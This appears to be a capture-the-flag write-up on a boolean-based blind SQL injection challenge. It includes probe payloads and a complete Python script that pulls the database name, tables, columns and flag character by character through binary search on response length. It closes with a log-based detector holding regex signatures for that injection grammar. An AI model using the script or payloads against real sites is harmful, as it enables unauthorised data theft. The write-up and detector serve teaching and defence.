Challenge analysis: emm, this is a SQL injection challenge (one look at the query form and it's obvious).
First, poke at the page (still built with Bootstrap, the same old grind),

emm, it feels like a numeric injection. After many attempts there was no error echo, and union injection also ran into problems; while trying things I noticed the page might be vulnerable to boolean-based blind injection.
So, give it a try:
0^1

0^0

Two different results, so start the boolean blind injection. Luckily the challenge author was kind and did not filter anything, so on to writing the script:
```python
import requests
import time

host = "http://b9e40acf-6866-4745-8b92-68ae03a88d82.node4.buuoj.cn:81/index.php"
# response length when the injected condition is true: 3640
# response length when it is false: 3638
# database = ctf


def getdatabase():
    database_name = ""
    for x in range(1, 1000):
        # binary search over the printable ASCII range for character x
        low = 32
        height = 127
        mid = (low + height) // 2
        while low < height:
            params = {
                "stunum": "0^(ascii(mid(database()," + str(x) + ",1))>" + str(mid) + ")"
            }
            r = requests.get(url=host, params=params)
            if len(r.text) == 3640:
                low = mid + 1
            else:
                height = mid
            mid = (low + height) // 2
        # past the end of the string ascii() returns 0, so the search collapses to a bound
        if low <= 32 or height >= 127:
            break
        database_name += chr(mid)
    print("Database:", database_name)


# payload: 0^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),"+str(x)+",1))>"+str(mid)+")
# tables: flag,score
def gettable():
    table_name = ""
    for x in range(1, 1000):
        low = 32
        height = 127
        mid = (low + height) // 2
        while low < height:
            params = {
                "stunum": "0^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),"
                + str(x) + ",1))>" + str(mid) + ")"
            }
            r = requests.get(url=host, params=params)
            if len(r.text) == 3640:
                low = mid + 1
            else:
                height = mid
            mid = (low + height) // 2
        if low <= 32 or height >= 127:
            break
        table_name += chr(mid)
    print("Tables:", table_name)
    time.sleep(1)


# columns: flag,value
def getcolumn():
    column_name = ""
    for x in range(1, 1000):
        low = 32
        height = 127
        mid = (low + height) // 2
        while low < height:
            params = {
                "stunum": "0^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),"
                + str(x) + ",1))>" + str(mid) + ")"
            }
            r = requests.get(url=host, params=params)
            if len(r.text) == 3640:
                low = mid + 1
            else:
                height = mid
            mid = (low + height) // 2
        if low <= 32 or height >= 127:
            break
        column_name += chr(mid)
    print("Columns:", column_name)
    time.sleep(1)


def getflag():
    flag = ""
    for x in range(1, 1000):
        low = 32
        height = 127
        mid = (low + height) // 2
        while low < height:
            params = {
                "stunum": "0^(ord(substr((select(group_concat(value))from(flag))," + str(x) + ",1))>" + str(mid) + ")"
            }
            r = requests.get(url=host, params=params)
            if len(r.text) == 3640:
                low = mid + 1
            else:
                height = mid
            mid = (low + height) // 2
        if low <= 32 or height >= 127:
            break
        flag += chr(mid)
    print("Flag:", flag)
    time.sleep(1)


getdatabase()
gettable()
getcolumn()
getflag()
```
- Because the page returns a lot of text, I distinguish true from false by the response length, and the search uses binary search (binary search is the best), which is much faster than brute force.
- The database name doesn't actually need to be queried: when looking up table_name, writing database() directly in place of the database name also works.
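The script above leaves a characteristic trail in the web server's access log: a burst of near-identical requests to one parameter that differ only in the numeric threshold. As an added defender-side example (not code from the original post), here is a small Python detector that parses constructed Apache-style log lines, flags values carrying the XOR / ascii / substr grammar used above, and reports (client, parameter) pairs whose probes differ only in numbers, which is the fingerprint of a binary search; the log format is assumed and the stunum parameter name follows the challenge.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not from the original post): a normal lookup,
# then probes shaped like the ones the writeup's script sends.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?stunum=1001 HTTP/1.1" 200 3640
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?stunum=0%5E(ascii(mid(database(),1,1))%3E79) HTTP/1.1" 200 3640
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?stunum=0%5E(ascii(mid(database(),1,1))%3E103) HTTP/1.1" 200 3638
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?stunum=0%5E(ascii(mid(database(),1,1))%3E91) HTTP/1.1" 200 3640
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?stunum=0%5E(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=%27ctf%27)),1,1))%3E79) HTTP/1.1" 200 3638
"""

# Combined-log-format prefix (assumed); only the ip and request target are used
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r"(?P<status>\d+) (?P<size>\d+)"
)

# Fragments of the blind-injection grammar used on this page: an XOR-ed comparison,
# a per-character extraction call, and catalogue access.
SIGNATURES = {
    "xor_compare": re.compile(r"\^\s*\(.*[<>=]", re.S),
    "char_extract": re.compile(r"\b(ascii|ord)\s*\(\s*(mid|substr|substring)\s*\(", re.I),
    "schema_probe": re.compile(r"\binformation_schema\.", re.I),
}

def classify(value):
    """Return the names of the signatures matched by one decoded parameter value."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]

def analyze(log_text, min_variants=3):
    """Return (hits, searches): one (ip, param, signatures) tuple per flagged request,
    and per (ip, param, payload shape) the number of probes differing only in numbers."""
    hits, shapes = [], defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qsl percent-decodes, so %5E becomes ^ and %3E becomes > before matching
        for param, value in parse_qsl(urlsplit(m["target"]).query):
            sigs = classify(value)
            if sigs:
                hits.append((m["ip"], param, sigs))
                # replace every number with N so the binary-search thresholds collapse
                shapes[(m["ip"], param, re.sub(r"\d+", "N", value))].add(value)
    searches = {k: len(v) for k, v in shapes.items() if len(v) >= min_variants}
    return hits, searches
```

On the constructed log, analyze(SAMPLE_LOG) flags the four probes from 10.0.0.9 and reports one payload shape seen with three numeric variants; the normal lookup from 10.0.0.5 is not flagged.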
Please credit the source when reposting; this article's link: https://www.uj5u.com/qita/356046.html